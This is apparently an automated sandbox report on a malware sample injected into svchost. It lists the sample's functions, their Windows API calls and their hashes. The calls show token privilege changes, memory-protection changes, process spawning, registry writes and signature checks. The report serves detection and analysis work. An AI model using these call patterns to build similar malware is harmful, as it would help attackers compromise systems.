RtlFreeHeap.NTDLL(00000000), ref: 02AC2D8D

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: File$CreateHeap$CopyFreeProcess
String ID:
API String ID: 2735472767-0
Opcode ID: 268a0ea774c4c1dcff0b0a55091ba1925473c2700cd4371da985a13ea37c8f99
Instruction ID: 9a6005e4687c7c17a0c270c9f508463b305c9e9b6c3343b17f99767a5359ba83
Opcode Fuzzy Hash: 268a0ea774c4c1dcff0b0a55091ba1925473c2700cd4371da985a13ea37c8f99
Instruction Fuzzy Hash: DD01FF76840218FBCF12AF90DD05FDDBB39EB14751F2045A5FD09A5160EF328A60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02AC2674 Relevance: 4.5, APIs: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008007), ref: 02AC2679

Part of subcall function 02AC2973: lstrcpyW.KERNEL32(02AC62F2,02AC63B4), ref: 02AC298C
Part of subcall function 02AC2973: lstrcatW.KERNEL32(02AC62F0,02AC7338), ref: 02AC299C
Part of subcall function 02AC2973: SetUnhandledExceptionFilter.KERNEL32(Function_000017E8), ref: 02AC29A7

Part of subcall function 02AC26ED: memset.MSVCRT ref: 02AC2709
Part of subcall function 02AC26ED: RtlGetVersion.NTDLL(?), ref: 02AC271E

Part of subcall function 02AC3555: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 02AC3570
Part of subcall function 02AC3555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02AC3585
Part of subcall function 02AC3555: GetLastError.KERNEL32 ref: 02AC358B
Part of subcall function 02AC3555: GetProcessHeap.KERNEL32(00000008,00000001), ref: 02AC35A1
Part of subcall function 02AC3555: RtlAllocateHeap.NTDLL(00000000), ref: 02AC35A8
Part of subcall function 02AC3555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02AC35C1
Part of subcall function 02AC3555: GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 02AC35CF
Part of subcall function 02AC3555: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02AC35F0
Part of subcall function 02AC3555: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC35FD
Part of subcall function 02AC3555: HeapFree.KERNEL32(00000000), ref: 02AC3604

ExitProcess.KERNEL32 ref: 02AC26E6

Part of subcall function 02AC25E3: lstrcpyW.KERNEL32(?,02AC7328), ref: 02AC25F6
Part of subcall function 02AC25E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02AC2612
Part of subcall function 02AC25E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02AC2623
Part of subcall function 02AC25E3: GetLastError.KERNEL32 ref: 02AC262D

Part of subcall function 02AC2C33: StrStrIW.KERNELBASE(02AC63B4,?), ref: 02AC2C67

Part of subcall function 02AC1BB9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC1BFF
Part of subcall function 02AC1BB9: HeapFree.KERNEL32(00000000), ref: 02AC1C06

Part of subcall function 02AC1FE9: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02AC1FF0
Part of subcall function 02AC1FE9: CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02AC2009
Part of subcall function 02AC1FE9: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02AC2014

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Create$ErrorEventToken$ChangeCloseFindFreeInformationLastNotificationlstrcpy$AllocateAuthorityExceptionExitFilterModeOpenThreadUnhandledVersionlstrcatmemset
String ID:
API String ID: 179549865-0
Opcode ID: 73f0001b2f5fbc67894f84a23f2442c63e526d724e4735dce3ab7b07bf97d01c
Instruction ID: f185edbd0c17e8f4d8f6254b17eb67031bb3ae13502b251d8bef2778d6467d62
Opcode Fuzzy Hash: 73f0001b2f5fbc67894f84a23f2442c63e526d724e4735dce3ab7b07bf97d01c
Instruction Fuzzy Hash: 55F039706C03029EEA0477F9DF55B1E311A9F54706F34486DAD69C9195DE14D4110E36

Uniqueness

Uniqueness Score: -1.00%

Function 02AC29F5 Relevance: 3.1, APIs: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b7610d2357cadf7a87f45e7f6016efa84df3c2f1efff65ea545c4507494ced
Instruction ID: cc528dcf149000527ee020c3ac91685575b75513db08c135459754fd5c9c060f
Opcode Fuzzy Hash: 90b7610d2357cadf7a87f45e7f6016efa84df3c2f1efff65ea545c4507494ced
Instruction Fuzzy Hash: 87512675654302AFE318CF69D890BA6B3F8EF88714F25486DE956C7250EB30E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02AC54AC Relevance: 3.1, APIs: 2, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 02AC54C0
CreateDirectoryW.KERNELBASE(00000000,02AC62B8), ref: 02AC5500

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: ffc25c915be06689980a224a2490fbd2c320e39e311ce47ba633575517540c7d
Instruction ID: 72ed42fe08c36df1d2c6d0c160eef0ebf2bff9614a72fe60baadea8624f600cd
Opcode Fuzzy Hash: ffc25c915be06689980a224a2490fbd2c320e39e311ce47ba633575517540c7d
Instruction Fuzzy Hash: D01186A6A4021C7EF701B6A59C45DFFBBBCDF85A61F20405BF904D7140EE28AA069B71

Uniqueness

Uniqueness Score: -1.00%

Function 02AC55BC Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 02AC55D3
CreateDirectoryW.KERNELBASE(?,02AC62B8), ref: 02AC561C

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: 67a5c45184b9baa6cc57fef29f6d2418375fa6db84e1507cd7dcd93238efa466
Instruction ID: 29e837644a8b32e2bd64405260e3509861f5dacf263fcdd0a02f2b4718925d03
Opcode Fuzzy Hash: 67a5c45184b9baa6cc57fef29f6d2418375fa6db84e1507cd7dcd93238efa466
Instruction Fuzzy Hash: D3017972E4011C7EFB1066A5EC89D7FBB7CEB85B54B34001EF905D2140DD64B9058A71

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1BB9 Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC1BFF
HeapFree.KERNEL32(00000000), ref: 02AC1C06

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 99d9980234f23fa2d97b4ce272ab910cd959c3434415bb58ff42f97dac8dbe0e
Instruction ID: 7ef59ad31e94243a21e759425915e06ae5671c57218db2dc2d0e6b629a82cb16
Opcode Fuzzy Hash: 99d9980234f23fa2d97b4ce272ab910cd959c3434415bb58ff42f97dac8dbe0e
Instruction Fuzzy Hash: 3AF05E76D44108BBDF00EBE8CD45FDEB77CAB04305F200591FA14E2281EB719724ABA5

Uniqueness

Uniqueness Score: -1.00%

Function 02AC3641 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02AC2790), ref: 02AC3659

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: cbfffc489e88281e397f8858dce58b64804c27928c8c924e67ebbcd693bfcef0
Instruction ID: 206fdd7c3f838097650ffcd55d224c46dddda0e96bd36d36b2054235dc3db24a
Opcode Fuzzy Hash: cbfffc489e88281e397f8858dce58b64804c27928c8c924e67ebbcd693bfcef0
Instruction Fuzzy Hash: 31D0C233A1421C56CB00A6B9AD099CBF7FC9B8C620F1049A6E501E7140E861999547E0

Uniqueness

Uniqueness Score: -1.00%

Function 02AC29AE Relevance: 1.3, APIs: 1, Instructions: 22sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02AC2BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02AC2BDA
Part of subcall function 02AC2BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02AC2C23

Sleep.KERNELBASE(000000FF), ref: 02AC29E9

Part of subcall function 02AC2674: SetErrorMode.KERNELBASE(00008007), ref: 02AC2679

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual$ErrorModeSleep
String ID:
API String ID: 46048798-0
Opcode ID: bfba7ac5bb7ec6ac1dfb0646bdb16c2f2978d5228350ff19f38d1810ae5f16ce
Instruction ID: 0edde0f47a7fb0ca648c1ddc776b3e6e3fc03bd8965a1e99b115ff821ffc367b
Opcode Fuzzy Hash: bfba7ac5bb7ec6ac1dfb0646bdb16c2f2978d5228350ff19f38d1810ae5f16ce
Instruction Fuzzy Hash: 4BE01A329501118FDA58AB689E48B9532B56F08710F260A69AD218F194DF20C881DBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02AC3E7E Relevance: 12.1, APIs: 8, Instructions: 70encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,02AC73C8,00000001,F0000000,00000094,?), ref: 02AC3EA1
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,00000001), ref: 02AC3EBE
CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 02AC3ED4
CryptImportKey.ADVAPI32(?,00000000,00000094,00000000,00000000,?), ref: 02AC3EF1
CryptVerifySignatureA.ADVAPI32(?,00000000,00000080,00000000,00000000,00000000), ref: 02AC3F0D
CryptDestroyKey.ADVAPI32(?), ref: 02AC3F18
CryptDestroyHash.ADVAPI32(?), ref: 02AC3F26
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02AC3F30

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportReleaseSignatureVerify
String ID:
API String ID: 972346567-0
Opcode ID: 136427422de88cf5d422aecd7c4e77912a643b29645c8901f4a1060b7b8affa7
Instruction ID: 0ed61a08f64e174f516512b480a16499f1c94c8ef8537567964289e58d81d5a7
Opcode Fuzzy Hash: 136427422de88cf5d422aecd7c4e77912a643b29645c8901f4a1060b7b8affa7
Instruction Fuzzy Hash: 1721DB36D40158BBCF215F96DD08E9EFF7DEB85B11F204599FA01A6150DB318A21EF90

Uniqueness

Uniqueness Score: -1.00%

Function 02AC2F1A Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(02AC7658,00000000,00000000,00000001,F0000000,02AC62B0,?,?,?,02AC5B88,?,00000000,?,?,02AC7658,?), ref: 02AC2F35
CryptCreateHash.ADVAPI32(02AC7658,00008003,00000000,00000000,?,00000000,?,?,?,02AC5B88,?,00000000,?,?,02AC7658,?), ref: 02AC2F52
CryptHashData.ADVAPI32(?,02AC7658,?,00000000,?,?,?,02AC5B88,?,00000000,?,?,02AC7658,?), ref: 02AC2F68
CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02AC5B88,?,00000000,?,?,02AC7658,?), ref: 02AC2F83
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02AC5B88,?,00000000,?), ref: 02AC2FA3
CryptDestroyHash.ADVAPI32(?,?,?,?,02AC5B88,?,00000000,?,?,02AC7658,?), ref: 02AC2FB3
CryptReleaseContext.ADVAPI32(02AC7658,00000000,?,?,?,02AC5B88,?,00000000,?,?,02AC7658,?), ref: 02AC2FC2

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDestroyParamRelease
String ID:
API String ID: 276068997-0
Opcode ID: f890429101aeeb26b14ddf7a31f20c24c8a895ece178f334791c2ddedbfd97e6
Instruction ID: 12e3fc49aa35e37c67ec20ffe81d08e32a641b6519a50bc3a4e73793af493f8d
Opcode Fuzzy Hash: f890429101aeeb26b14ddf7a31f20c24c8a895ece178f334791c2ddedbfd97e6
Instruction Fuzzy Hash: 71211A7294021DFFDF218F90DD85AAEBB7CEB04755F2045AAFE01A2150DB318E209FA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AC39E8 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,02AC1210,?,02AC71F0,?), ref: 02AC39F4
OpenProcessToken.ADVAPI32(00000000,?,02AC1210,?,02AC71F0,?), ref: 02AC39FB
LookupPrivilegeValueA.ADVAPI32(00000000,02AC71F0,02AC1210), ref: 02AC3A11
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02AC3A36
CloseHandle.KERNEL32(?,?,?,?,02AC1210,?,02AC71F0,?), ref: 02AC3A41

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 6378999ea377769cf06b2a8bf9555a28b5b982c1a3c189bcd7e29e521999df2d
Instruction ID: 8d080d70b1873dcadcda03bd852a3730466d246ed4e8a7a469d63dfeacc06356
Opcode Fuzzy Hash: 6378999ea377769cf06b2a8bf9555a28b5b982c1a3c189bcd7e29e521999df2d
Instruction Fuzzy Hash: BBF01D76D00118BBDB209B99DD4CDAFBABCEB89B10F104599B905E2200DB318E15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02AC4794 Relevance: 15.1, APIs: 10, Instructions: 143filesleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 02AC4830
CreateEventW.KERNEL32(02AC62B8,00000000,00000000,?), ref: 02AC4852
CreateFileMappingW.KERNEL32(000000FF,02AC62B8,00000004,00000000,00000000,?), ref: 02AC4886
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02AC489D
SetEvent.KERNEL32(00000000), ref: 02AC48D9
WaitForSingleObject.KERNEL32(?,00000BB8), ref: 02AC48EC
UnmapViewOfFile.KERNEL32(00000000), ref: 02AC48F3
CloseHandle.KERNEL32(?), ref: 02AC4903
CloseHandle.KERNEL32(?), ref: 02AC4910
CloseHandle.KERNEL32(00000000), ref: 02AC4917

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateEventView$MappingObjectSingleSleepUnmapWait
String ID:
API String ID: 3151294157-0
Opcode ID: a5c11a0edbce3d00af23a7dd36022076e6ce7a0f88f2f87bcae32977b81f981c
Instruction ID: d0cf2ea7b4523f0ef8d61254b618431a0af3e5c27e5c144c3ea61ec7f14eeb27
Opcode Fuzzy Hash: a5c11a0edbce3d00af23a7dd36022076e6ce7a0f88f2f87bcae32977b81f981c
Instruction Fuzzy Hash: 0241D731548396AFD3219F549C95BA7BBACFF89760F20081DF589C6181DF70C409CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1CD5 Relevance: 12.1, APIs: 8, Instructions: 115memorysleepstringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02AC1CFD
RtlAllocateHeap.NTDLL(00000000), ref: 02AC1D04

Part of subcall function 02AC1F07: wsprintfA.USER32 ref: 02AC1F49

lstrcpy.KERNEL32(00000000,00000000), ref: 02AC1D2D
GetProcessHeap.KERNEL32(00000000,?), ref: 02AC1DF6
HeapFree.KERNEL32(00000000), ref: 02AC1DFD
Sleep.KERNEL32(00001388), ref: 02AC1E08
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC1E1A
HeapFree.KERNEL32(00000000), ref: 02AC1E21

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpywsprintf
String ID:
API String ID: 4213899483-0
Opcode ID: f3f9822e240b56da6b0583ec13d9d146cfd7af76ef4423e4f7a4907c225a355a
Instruction ID: f1746dfa42ad1fa687afbbc55fdbad1273eb41d5bcd933c88b5b0dc4d1173cbf
Opcode Fuzzy Hash: f3f9822e240b56da6b0583ec13d9d146cfd7af76ef4423e4f7a4907c225a355a
Instruction Fuzzy Hash: 51417BB1A043009FD7209F69D888B2BBBE8FF88315F20492EF599D2251DB74D515CF66

Uniqueness

Uniqueness Score: -1.00%

Function 02AC1E38 Relevance: 12.1, APIs: 8, Instructions: 81memorystringthreadCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,02AC1148,00000009,00000000,02AC71E0,00000007), ref: 02AC1E47
GetProcessHeap.KERNEL32(00000008,-0000000B,?,?,?,?,02AC1148,00000009,00000000,02AC71E0,00000007), ref: 02AC1E67
RtlAllocateHeap.NTDLL(00000000), ref: 02AC1E6E
lstrcpy.KERNEL32(0000000C,00000000), ref: 02AC1E97
CreateThread.KERNEL32(00000000,00000000,02AC1F56,00000000,00000000,00000000), ref: 02AC1EDB
CloseHandle.KERNEL32(00000000,?,?,?,?,02AC1148,00000009,00000000,02AC71E0,00000007), ref: 02AC1EE6
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,02AC1148,00000009,00000000,02AC71E0,00000007), ref: 02AC1EF3
HeapFree.KERNEL32(00000000,?,?,?,?,02AC1148,00000009,00000000,02AC71E0,00000007), ref: 02AC1EFA

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseCreateFreeHandleThreadlstrcpylstrlen
String ID:
API String ID: 3086719409-0
Opcode ID: c3cd84364e5b34964a67aa487b09485cc52454ad0838f5802eac3767411c39fb
Instruction ID: a4c60dd420974b190add083aaacd51af863af8829cb105321d58c1e38c2ed445
Opcode Fuzzy Hash: c3cd84364e5b34964a67aa487b09485cc52454ad0838f5802eac3767411c39fb
Instruction Fuzzy Hash: 4C219171A00746AFDB118F65CC88A67BBACFF05358B248919E949C6215DF70E81ACFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AC598A Relevance: 10.6, APIs: 7, Instructions: 100memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 02AC59D3
GetProcessHeap.KERNEL32(00000008,00000000), ref: 02AC59E8
RtlAllocateHeap.NTDLL(00000000), ref: 02AC59EF
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,-00000001,?), ref: 02AC5A09
GetProcessHeap.KERNEL32(00000000,?), ref: 02AC5A1E
HeapFree.KERNEL32(00000000), ref: 02AC5A25
RegCloseKey.ADVAPI32(00000000), ref: 02AC5A2C

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFree
String ID:
API String ID: 1930173803-0
Opcode ID: b764954b52028201caf81d8dc3d4d9a0ca3702765a28d87e3d6a927b52b9e55a
Instruction ID: 9769dec1d6c3afb632304f6558b91cb3817b3a4394883403694c781b12795a4d
Opcode Fuzzy Hash: b764954b52028201caf81d8dc3d4d9a0ca3702765a28d87e3d6a927b52b9e55a
Instruction Fuzzy Hash: 5831D471A40201AFE7209F24CC88B3BB7ACEF49725F24485CF995E7240DF74E8068B61

Uniqueness

Uniqueness Score: -1.00%

Function 02AC15D5 Relevance: 10.6, APIs: 7, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 02AC15E4
GetProcessHeap.KERNEL32(00000008,-00000103), ref: 02AC15FA
RtlAllocateHeap.NTDLL(00000000), ref: 02AC1601

Part of subcall function 02AC56E6: GetTempPathA.KERNEL32(00000104,?), ref: 02AC56F7

Part of subcall function 02AC2E5A: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02AC2E75

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC1669
HeapFree.KERNEL32(00000000), ref: 02AC1670
GetProcessHeap.KERNEL32(00000000,?), ref: 02AC1683
HeapFree.KERNEL32(00000000), ref: 02AC168A

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateCreateFilePathTemplstrlen
String ID:
API String ID: 953720001-0
Opcode ID: 6e0e101c5586c03c389e0607d46acce6039196f7fa773ccd4abd78824db1b637
Instruction ID: 03ea60d3f816d546ff1e0510748100edaac2701d326b654aa3f495090cca8bd7
Opcode Fuzzy Hash: 6e0e101c5586c03c389e0607d46acce6039196f7fa773ccd4abd78824db1b637
Instruction Fuzzy Hash: 9011E172A40205BBEB006FA09C88F7ABB6CEF4A725F28481DFA49C1141DF74D8128F75

Uniqueness

Uniqueness Score: -1.00%

Function 02AC4E55 Relevance: 10.6, APIs: 7, Instructions: 62memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000002,00000000,?,?,02AC49A2,00000000,00000000,?,00000000,00000000,02AC70E8), ref: 02AC4E70
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02AC4E77
CreateThread.KERNEL32(00000000,00000000,02AC4F6B,00000000,00000000,00000000), ref: 02AC4EAA
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,02AC70E8), ref: 02AC4EB6
HeapFree.KERNEL32(00000000,?,00000000,00000000,02AC70E8), ref: 02AC4EBD
CloseHandle.KERNEL32(00000000,00000000,?,?,02AC49A2,00000000,00000000,?,00000000,00000000,02AC70E8), ref: 02AC4ECD
CloseHandle.KERNEL32(00000000,?,00000000,00000000,02AC70E8), ref: 02AC4EDF

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$AllocateCreateFreeThread
String ID:
API String ID: 1729137577-0
Opcode ID: 4d72d5232d1654846fbe54975e96d3b3dabe68ef492c750c7c09d1119f2c2cc4
Instruction ID: 744b532a70d3dd7c8141ddb19e8fec447196267b7c308c987d8d8feaf6e3d144
Opcode Fuzzy Hash: 4d72d5232d1654846fbe54975e96d3b3dabe68ef492c750c7c09d1119f2c2cc4
Instruction Fuzzy Hash: E8112571E443216BD3204F745C5CBA7AA5DAF4DB11F26491CF941DA288CF20C8058EA8

Uniqueness

Uniqueness Score: -1.00%

Function 02AC58A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 02AC2EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02AC2D76,?,?,?,?), ref: 02AC2ED5

memset.MSVCRT ref: 02AC58E2
lstrcpyW.KERNEL32(?,02AC63B4), ref: 02AC590D
lstrcatW.KERNEL32(?,02AC764C), ref: 02AC591F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02AC593B
ExitProcess.KERNEL32 ref: 02AC5946

Strings

D, xrefs: 02AC58EA

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: CreateProcess$ExitFilelstrcatlstrcpymemset
String ID: D
API String ID: 898148731-2746444292
Opcode ID: 298e705b44038279af67bf3cb7b3971e51e1d150af9f19528a611b00d0538318
Instruction ID: f59be799a80b4251826c3f4f5e89c427c6832728d0e6de8cb9479edfe42f54fd
Opcode Fuzzy Hash: 298e705b44038279af67bf3cb7b3971e51e1d150af9f19528a611b00d0538318
Instruction Fuzzy Hash: 721130B2940208AFDB10DBE4DD49FDA777CEF84715F204465BA09E6140EF34DA258F65

Uniqueness

Uniqueness Score: -1.00%

Function 02AC3BE0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02AC3BF9
RtlReAllocateHeap.NTDLL(00000000), ref: 02AC3C4D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000104,00000000,00000000), ref: 02AC3CB5
HeapFree.KERNEL32(00000000), ref: 02AC3CEB
HeapFree.KERNEL32(00000000), ref: 02AC3D00

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2ac1000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocateByteCharCurrentMultiProcessWide
String ID:
API String ID: 3321845206-0
Opcode ID: 23f2cae91c49e3d63fdb4cc03a3865451ee7e0cac357d49ed86504fdf7eb4ccf
Instruction ID: 83ff85e72797aa66560547f840a458661870794ba39ace14a81f831d20890322
Opcode Fuzzy Hash: 23f2cae91c49e3d63fdb4cc03a3865451ee7e0cac357d49ed86504fdf7eb4ccf
Instruction Fuzzy Hash: 0031C37160C315AFEB219B64CC88B7FBAACEF44B45F20885CB945C6040EF60D898CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02AC5A75 Relevance: 9.1, APIs: 6, Instructions: 92memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00000001), ref: 02AC5ACA
RtlAllocateHeap.NTDLL(00000000), ref: 02AC5AD1
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,?,00000001), ref: 02AC5B24
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02AC5B2F
HeapFree.KERNEL32(00000000), ref: 02AC5B36
RegCloseKey.ADVAPI32(?), ref: 02AC5B3D

Memory Dump Source

Source File: 00000013.00000002.3296108419.0000000002AC1000.00000020.00000400.00020000.00000000.sdmp, Offset: 02AC1000, based on PE: false

